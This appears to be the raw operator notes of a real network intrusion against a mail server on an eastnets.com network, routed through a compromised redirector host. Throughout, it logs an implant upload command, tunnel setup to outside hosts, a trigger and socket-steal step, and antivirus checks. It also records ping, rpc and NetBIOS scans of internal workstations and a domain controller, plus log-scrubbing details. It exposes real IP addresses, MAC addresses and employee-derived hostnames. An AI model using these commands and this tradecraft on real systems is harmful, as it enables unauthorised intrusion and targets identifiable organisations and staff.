ISP: LK
City:
Phone:
ISP IP: 186.120.114.169
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: PITCHIMPAIR
Redirect Host 1: 210.135.90.41
Redirect Target 1: 192.168.1.3

BEGIN UNIX OPNOTES:

Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
--> 210.135.90.41 cnt1.din.or.jp pitchimpair unix successful
---> 192.168.1.3 endxbmail001.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:

PROJECT=JEEPFLEA_MARKET
OPUSER=85521
OPSCHEDULE=13082113184448
SCRUBVER=6.007000008

======================= P0
--- 210.135.90.41 --- cnt1
=======================
ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41
2013-08-29 02:44:00 UTC -- on target
2013-08-29 02:46:02 UTC -- w
Uptime: 106 day(s), 0:15:26
2013-08-29 02:57:51 UTC -- tunnels
-tunnel
l 110 213.132.40.101 110 38951
-rawsend 666

2013-08-29 04:06:03 UTC -- checking some others
-ping 80.227.254.201
ICMP Reply (80.227.254.201) 195.906 ms 80.227.254.201 > 210.135.90.41 (TTL 51)
-ping -r 80.227.254.201 -i -p 48600
ICMP Reply (80.227.254.201) 1.4294166 s 80.227.254.201 > 210.135.90.41 (TTL 51)
.... no other open ports

2013-08-29 04:27:35 UTC -- another target 80.227.254.202
-ping -r 80.227.254.202 -t -p 2194
80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)
-ping -r 80.227.254.202 -t -p 2443
80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)

2013-08-29 05:39:46 UTC -- preburn checks
2013-08-29 05:39:54 UTC -- bb

LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238
###################
SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174
###################
Final lines of bwmonitor.txt:
Thu Aug 29 05:43:04 UTC 2013
eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr
TX 3429926 (3.3) 13314 0.0 (0.0) 1.3 0.8 0.9
RX 4484806 (4.3) 12814 0.0 (0.0) 5.0 1.7 1.5

###################################################
PROJECT: jeepflea_market
DATE: 02:42 AM 08/29/2013
OPUSER: 85521
OPSCHEDULE: 13082113184448
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:

Results:

======================= T1
--- 192.168.1.3 --- endxbmail001
=======================
2:58 AM 8/29/2013 --- trigger sent
3:01 AM 8/29/2013 -- failed with only forward tunnel
3:01 AM 8/29/2013 -- trying with rawsend
3:03 AM 8/29/2013 -- hadouken... socketsteal w/ 110
Uptime: 95 days, 19:0:10
3:10 AM 8/29/2013 -- Kaspersky Endpoint Security 8.1.0.831
3:17 AM 8/29/2013 -- hour clean
3:20 AM 8/29/2013 -- looking for targs
nslookup endxb-kbaluyot - 192.168.153.144
nslookup kbaluyot - 10.10.10.118
nslookup managment - failed
nslookup endjuy - failed
nslookup endxb-asanghvi - failed
nslookup asanghvi - failed
nslookup juy - 10.10.10.117
nslookup vmailbox2 - 192.168.2.12
nslookup endxb-msyed - 10.10.10.74
nslookup msyed - failed

3:25 AM 8/29/2013 -- scanning 192.168.153.144
ping - failed
rpc 192.168.153.144 1 445 - failed
3:31 AM 8/29/2013 -- scanning some more targs
ping 10.10.10.117
REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63
netbios -target 10.10.10.117 - failed
rpc 10.10.10.117 1 445 - failed
ping 10.10.10.1 - failed
ping 10.10.10.118 - failed
ping 192.168.2.12 - failed
ping 10.10.10.74 - failed
ping 80.227.254.243 - failed
4:20 AM 8/29/2013 -- trying some fws
banner -ip 80.227.254.201 -tcp -port 2443 - can't reach network
ping 172.16.104.17 - failed

5:12 AM 8/29/2013 -- seeing if they are in
REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127
netbios -target 10.10.10.118
---------------------------------------------------------------------
ENDXB-COBAS UNIQUE REGISTERED Workstation Service
EASTNETS GROUP REGISTERED Domain Name
ENDXB-COBAS UNIQUE REGISTERED File Server Service
EASTNETS GROUP REGISTERED Browser Service Elections

Adapter Address: 00.26.c6.38.98.30
Adapter Type : Ethernet Adapter

netbios -target 192.168.153.144 - fail
rpc 10.10.10.118 1 445

5:22 AM 8/29/2013 -- netbios -target 10.10.10.23
ENDXB-CALTAKI UNIQUE REGISTERED Workstation Service
EASTNETS GROUP REGISTERED Domain Name
ENDXB-CALTAKI UNIQUE REGISTERED File Server Service
EASTNETS GROUP REGISTERED Browser Service Elections

Adapter Address: 9c.b7.0d.17.7b.e6
Adapter Type : Ethernet Adapter

5:31 AM 8/29/2013 -- netbios -target 192.168.2.10
---------------------------------------------------------------------
VDC04 UNIQUE REGISTERED Workstation Service
EASTNETS GROUP REGISTERED Domain Name
EASTNETS GROUP REGISTERED Domain Controller
VDC04 UNIQUE REGISTERED File Server Service

Adapter Address: 00.0c.29.8d.e3.3a
Adapter Type : Ethernet Adapter

5:37 AM 8/29/2013